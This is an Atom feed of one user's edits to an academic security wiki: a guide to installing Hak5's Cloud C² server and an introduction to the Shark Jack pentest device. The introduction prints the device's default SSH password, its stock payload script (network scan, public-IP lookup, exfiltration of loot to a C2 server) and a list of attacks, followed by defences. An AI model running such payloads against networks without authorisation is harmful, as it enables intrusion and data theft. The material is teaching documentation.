<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=AKoch</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=AKoch"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/AKoch"/>
	<updated>2026-09-10T13:47:47Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Cloud_C%C2%B2&amp;diff=17175</id>
		<title>Cloud C²</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Cloud_C%C2%B2&amp;diff=17175"/>
		<updated>2024-12-16T17:17:43Z</updated>

		<summary type="html">&lt;p&gt;AKoch: Creating a short installation guide for the cloud c² by hak5.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Cloud C² is a software developed by Hak5 that gives us a remote connection with Hak5 products like [[Shark Jack]]. After this short installation guide, you will be able to connect your devices to your own Cloud C² instance.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: a Server, like Ubuntu 24.04.1 LTS&lt;br /&gt;
* Packages: wget unzip&lt;br /&gt;
* If you want to access the software via the internet, you must have access to your firewall / modem / router to redirect a port!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Installation Guide ==&lt;br /&gt;
First of all, you have to apply for a license-key under https://shop.hak5.org/products/c2#c2-versions - for study reasons you can apply for a free one. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Get Cloud C² ===&lt;br /&gt;
To install the Cloud C² it is only necessary to get the latest zip-folder by wget on your server and unzip it.&lt;br /&gt;
&lt;br /&gt;
 wget -q https://c2.hak5.org/download/latest -O cloudc2.zip&lt;br /&gt;
 unzip cloudc2.zip&lt;br /&gt;
&lt;br /&gt;
After that you will find all possible binary files for different operation systems.&lt;br /&gt;
&lt;br /&gt;
https://wiki.elvis.science/images/9/92/GetCloudC2.png&lt;br /&gt;
&lt;br /&gt;
=== Start Cloud C² ===&lt;br /&gt;
&lt;br /&gt;
Now you can simple start the suitable binary for your operating system with additional parameters. Only the &amp;quot;hostname&amp;quot; is necessary.&lt;br /&gt;
By default the port 8080 is used. Mention that this is the port, that has to be redirected when you want to access the Cloud C² via the internet. &lt;br /&gt;
You can change that port by parsing the &amp;quot;listenport&amp;quot; parameter.&lt;br /&gt;
Please also note that your hostname should be resolvable by DNS when you using a name instead of an IP-Address.&lt;br /&gt;
&lt;br /&gt;
For example:&lt;br /&gt;
 ./c2-3.4.0_amd64_linux -hostname myHostname -listenport 8000&lt;br /&gt;
&lt;br /&gt;
More details about the possible parameters are visible at https://docs.hak5.org/cloud-c2/getting-started/installation-and-setup.&lt;br /&gt;
&lt;br /&gt;
The output should look similar like this:&lt;br /&gt;
&lt;br /&gt;
https://wiki.elvis.science/images/f/fa/StartUpCloudC2.png&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Initialize Cloud C² ===&lt;br /&gt;
If you followed the above manual, you should be able to access the web interface from your Cloud C² instance on the web link - which can be found in the output of the starting binary.&lt;br /&gt;
&lt;br /&gt;
The web interfaces should look like this:&lt;br /&gt;
&lt;br /&gt;
https://wiki.elvis.science/images/thumb/7/76/InitSetupCloudC2.png/372px-InitSetupCloudC2.png&lt;br /&gt;
&lt;br /&gt;
Insert your license key, fill out the form and you are ready to go.&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
From now on, you are able to add all your Hak5 devices to your own Cloud C². For doing this, follow the guide under https://docs.hak5.org/cloud-c2/getting-started/adding-devices, because they are maybe specific for your device.&lt;br /&gt;
Note that according to these instructions, the cloud is not running as a service in the background. If you terminate the existing terminal connection, the cloud will also be terminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://shop.hak5.org/products/c2#c2-versions&lt;br /&gt;
* https://docs.hak5.org/cloud-c2&lt;br /&gt;
* https://docs.hak5.org/cloud-c2/getting-started/adding-devices&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AKoch</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:InitSetupCloudC2.png&amp;diff=17169</id>
		<title>File:InitSetupCloudC2.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:InitSetupCloudC2.png&amp;diff=17169"/>
		<updated>2024-12-16T17:02:34Z</updated>

		<summary type="html">&lt;p&gt;AKoch: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>AKoch</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:GetCloudC2.png&amp;diff=17162</id>
		<title>File:GetCloudC2.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:GetCloudC2.png&amp;diff=17162"/>
		<updated>2024-12-16T16:45:07Z</updated>

		<summary type="html">&lt;p&gt;AKoch: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>AKoch</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:StartUpCloudC2.png&amp;diff=17159</id>
		<title>File:StartUpCloudC2.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:StartUpCloudC2.png&amp;diff=17159"/>
		<updated>2024-12-16T16:30:42Z</updated>

		<summary type="html">&lt;p&gt;AKoch: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>AKoch</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Shark_Jack:_Introduction&amp;diff=17158</id>
		<title>Shark Jack: Introduction</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Shark_Jack:_Introduction&amp;diff=17158"/>
		<updated>2024-12-16T16:15:45Z</updated>

		<summary type="html">&lt;p&gt;AKoch: overworked by Koch Armin for AKIT CSDC25BB&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Introduction = &lt;br /&gt;
The Shark Jack is a compact, Linux-based penetration testing device developed by Hak5, primarily designed for fast network reconnaissance and data exfiltration. Resembling a USB Ethernet adapter, it connects to a target network and runs payloads that can gather data, manipulate traffic, or exploit vulnerabilities. A lithium ion battery offers a running time of around 10-15 minutes. By default a predefined payload is installed. Seen in Example Payload.&lt;br /&gt;
&lt;br /&gt;
=Key Features=&lt;br /&gt;
&lt;br /&gt;
* Size: 62 x 21 x 12mm&lt;br /&gt;
* RJ45 Fast Ethernet&lt;br /&gt;
* USB-C charging port&lt;br /&gt;
* 2.5W (USB 5V 0.5A)&lt;br /&gt;
* Batterie 3.7V 50mAh 0.2W LiPo&lt;br /&gt;
* 35°C-45°C operating temperature&lt;br /&gt;
* MT7628DAN microcontroller&lt;br /&gt;
* 64 MB DDR RAM | 64 MB SPI Flash&lt;br /&gt;
* OpenWRT 18.06-based GNU/Linux operating system&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Modes of Operation =&lt;br /&gt;
The Shark Jack provides three modes of operation: Attack, Arming and Off. These modes can be activated by pushing the red toggle switch on the side.&lt;br /&gt;
&lt;br /&gt;
== Attack-Mode ==&lt;br /&gt;
This mode can be activated by pushing the red toggle switch in the RJ45 Ethernet Jack direction. In this mode, the device starts the bash script payload.sh or payload.txt from /root/payload after a short boot phase.&lt;br /&gt;
The results from this script - which in turn can execute further scripts - usually stored in a suitable folder in the /root/loot directory.&lt;br /&gt;
&lt;br /&gt;
== Arming-Mode ==&lt;br /&gt;
The ARMING-Mode is located in the middle position of the toggle switch. In this mode, the Shark Jack will start up an SSH-Server. After assigning an IP-Address in the 172.16.24.0/24 subnet to your device, you should be able to establish an SSH-Connection by root@172.16.24.1 (default password: hak5shark). Via the connection it is possible to change or update the payload-script in /root/payload and exfiltrate the collected loot from /root/loot directory by using &amp;quot;scp&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Off-Mode ==&lt;br /&gt;
By toggling the switch in the USB-C charging port direction, the device will turn off.&lt;br /&gt;
&lt;br /&gt;
= Payloads = &lt;br /&gt;
The payloads for the Shark Jack are written in Bash with some sort of DuckyScript. This means you can fully use the usual CLI commands from Linux, as well as use certain commands to manage the LED or the connection to the Cloud C² by Hak5 and transmit data.&lt;br /&gt;
&lt;br /&gt;
== Example Payload ==&lt;br /&gt;
The following payload is the predefined payload which comes with the Shark Jack out of the Box. Essentially, the device gets an IP address from a hopefully existing DHCP server and starts an NMAP scan.&lt;br /&gt;
It then saves the collected data under /root/loot/nmap and tries to transmit it to a Cloud C² by Hak5 - which can be configured via device.config in /etc. Otherwise you are still able to extract the data manually by using the ARMING-Mode. Special commands like &amp;quot;LED ATTACK&amp;quot;, &amp;quot;NETMODE DHCP_CLIENT&amp;quot; and &amp;quot;C2CONNECT&amp;quot; are the already mentioned DuckyScript commands. More about them can be found in the documentation from Hak5 itself.&lt;br /&gt;
&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
  # LED SETUP ... Obtaining IP address from DHCP&lt;br /&gt;
  # LED ATTACK ... Scanning&lt;br /&gt;
  # LED FINISH ... Scan Complete&lt;br /&gt;
  # LED SPECIAL ... Cloud C2 Exfiltration&lt;br /&gt;
  #&lt;br /&gt;
  # See nmap --help for options. Default &amp;quot;-sP&amp;quot; ping scans the address space for&lt;br /&gt;
  # fast host discovery with &amp;quot;-v&amp;quot; for more verbose&lt;br /&gt;
  C2PROVISION=&amp;quot;/etc/device.config&amp;quot;&lt;br /&gt;
  NMAP_OPTIONS=&amp;quot;-sP -v --host-timeout 30s --max-retries 3&amp;quot;&lt;br /&gt;
  LOOT_DIR=/root/loot/nmap&lt;br /&gt;
  # Setup loot directory, DHCP client, and determine subnet&lt;br /&gt;
  LED SETUP &lt;br /&gt;
  SERIAL_WRITE [*] Setting up Nmap Payload&lt;br /&gt;
  mkdir -p $LOOT_DIR &lt;br /&gt;
  COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))&lt;br /&gt;
  NETMODE DHCP_CLIENT &lt;br /&gt;
  while [ -z &amp;quot;$SUBNET&amp;quot; ]; do &lt;br /&gt;
  sleep 1 &amp;amp;&amp;amp; SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o &amp;quot;([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}&amp;quot; | sed &#039;s/\.[0-9]*\//\.0\//&#039;)&lt;br /&gt;
  done &lt;br /&gt;
  # Scan network &lt;br /&gt;
  LED ATTACK &lt;br /&gt;
  nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt&lt;br /&gt;
  SERIAL_WRITE [*] Setting up IP Payload&lt;br /&gt;
  PUBLIC_IP_URL=&amp;quot;http://ipinfo.io/ip&amp;quot;&lt;br /&gt;
  function FAIL() { LED FAIL; SERIAL_WRITE [!] Failed to obtain IP address;exit; }&lt;br /&gt;
  LED SETUP&lt;br /&gt;
  # Make log file&lt;br /&gt;
  LOG_FILE=&amp;quot;ipinfo_$(find $LOOT_DIR -type f | wc -l).txt&amp;quot;&lt;br /&gt;
  LOG=&amp;quot;$LOOT_DIR/$LOG_FILE&amp;quot;&lt;br /&gt;
  LED ATTACK&lt;br /&gt;
  # Gather IP info and save log&lt;br /&gt;
  INTERNALIP=$(ifconfig eth0 | grep &amp;quot;inet addr&amp;quot; | awk {&#039;print $2&#039;} | awk -F: {&#039;print $2&#039;})&lt;br /&gt;
  GATEWAY=$(route | grep default | awk {&#039;print $2&#039;})&lt;br /&gt;
  PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL&lt;br /&gt;
  echo -e &amp;quot;Date: $(date)\n\&lt;br /&gt;
  Internal IP Address: $INTERNALIP\n\&lt;br /&gt;
  Public IP Address: $PUBLICIP\n\&lt;br /&gt;
  Gateway: $GATEWAY\n&amp;quot; &amp;gt;&amp;gt; $LOG&lt;br /&gt;
  SERIAL_WRITE [*] Internal IP: $INTERNALIP&lt;br /&gt;
  SERIAL_WRITE [*] Public IP: $PUBLICIP&lt;br /&gt;
  SERIAL_WRITE [*] Gateway: $GATEWAY&lt;br /&gt;
  # Exfiltrate Loot to Cloud C2&lt;br /&gt;
  if [ [ -f &amp;quot;$C2PROVISION&amp;quot; ] ]; then&lt;br /&gt;
  LED SPECIAL &lt;br /&gt;
  # Connect to Cloud C2&lt;br /&gt;
  C2CONNECT&lt;br /&gt;
  # Wait until Cloud C2 connection is established&lt;br /&gt;
  while ! pgrep cc-client; do sleep 1; done&lt;br /&gt;
  # Exfiltrate all test loot files&lt;br /&gt;
  FILES=&amp;quot;$LOOT_DIR/*.txt&amp;quot;&lt;br /&gt;
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done&lt;br /&gt;
  else&lt;br /&gt;
  # Exit script if not provisioned for C2&lt;br /&gt;
  LED R SOLID&lt;br /&gt;
  exit 1&lt;br /&gt;
  fi&lt;br /&gt;
  LED FINISH&lt;br /&gt;
&lt;br /&gt;
= Possible Attacks =&lt;br /&gt;
After utilities such as Python, arping, nmap etc. are pre-installed on the Shark Jack and can be expanded via an OpenWRT repository, the following attacks are now possible:&lt;br /&gt;
&lt;br /&gt;
* Network scanning and vulnerability assessment&lt;br /&gt;
* Man-in-the-Middle-Attacks (MITM)&lt;br /&gt;
* DNS-Spoofing&lt;br /&gt;
* Credential Harvesting&lt;br /&gt;
* Denial-of-Service Attacks (DoS)&lt;br /&gt;
* Unauthorized Access into a Network via a remote SSH-Tunnel connection.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Defense =&lt;br /&gt;
&lt;br /&gt;
* deactivation of unused ports: All unnecessary Ethernet ports on switches should be switched off.&lt;br /&gt;
* assigning a Dead VLAN to ports, which cannot be deactivated&lt;br /&gt;
* 802.1x-Authentification: Through port security mechanisms or 802.1x authentication can only authorized devices gain access to the network.&lt;br /&gt;
* MAC-Filtering and DHCP hardening: The DHCP server can be configured to only use registered MAC addresses receive an IP address. Alternatively, DHCP can be disabled, which however is more difficult to implement in larger networks.&lt;br /&gt;
* physical security / access control&lt;br /&gt;
* usage of an Instrusion Detection System (IDS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
[[Shark Jack]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
https://docs.hak5.org/shark-jack&lt;br /&gt;
&lt;br /&gt;
https://github.com/hak5/sharkjack-payloads&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AKoch</name></author>
	</entry>
</feed>